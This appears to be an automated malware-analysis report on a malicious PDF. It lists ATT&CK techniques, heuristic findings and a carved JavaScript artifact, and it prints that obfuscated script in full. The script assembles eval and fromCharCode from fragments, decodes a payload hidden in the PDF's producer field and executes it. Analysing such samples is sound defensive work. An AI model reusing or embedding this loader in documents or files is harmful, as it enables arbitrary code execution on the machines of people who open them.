MALICIOUS
148
Risk Score
Malware Insights
MITRE ATT&CK
T1059.007 JavaScript
T1203 Exploitation for Client Execution
The PDF file contains embedded JavaScript that utilizes eval() to decode and execute a payload. The script appears to be heavily obfuscated, making precise reconstruction of the final payload difficult. However, the presence of PDF JavaScript exploit cluster heuristics and the use of eval() strongly indicate an attempt to execute arbitrary code.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0001_000.jsc2be8707cfc6e8371c5b8e15ce710d061603e0809713f2d01d94c6a7b3386082 |
pdf-javascript-stream | PDF /JS object 1 at offset 0x5744 | 670 bytes |
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var ZememgEsap='';
HujotoFonz = new Date(2010,11,3,2);
var BeviupOzake = function(){return {e:'eva'}}().e;
FumUzab=eval(BeviupOzake+'l');
NukpimeJubu = 'thi'+HujotoFonz.getHours()+'ducer';
GasemykobabYbavo=FumUzab(NukpimeJubu.replace(2,'s.pro'));
CegupuZyknatudoxoh = GasemykobabYbavo.split('s');
var JidAlevb = '';
g = HujotoFonz.getHours();
var HerYz = 'fro'+HujotoFonz.getHours()+'arCode';
HerYz=HerYz.replace(2,'mCh');
Jogolynybebewivxuq=String[HerYz];
for (JyjAqifuri = 0; JyjAqifuri < CegupuZyknatudoxoh.length; JyjAqifuri++) {
KycuJezo = FumUzab(CegupuZyknatudoxoh[JyjAqifuri]);
JidAlevb += Jogolynybebewivxuq(KycuJezo);
}
FumUzab(JidAlevb);
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.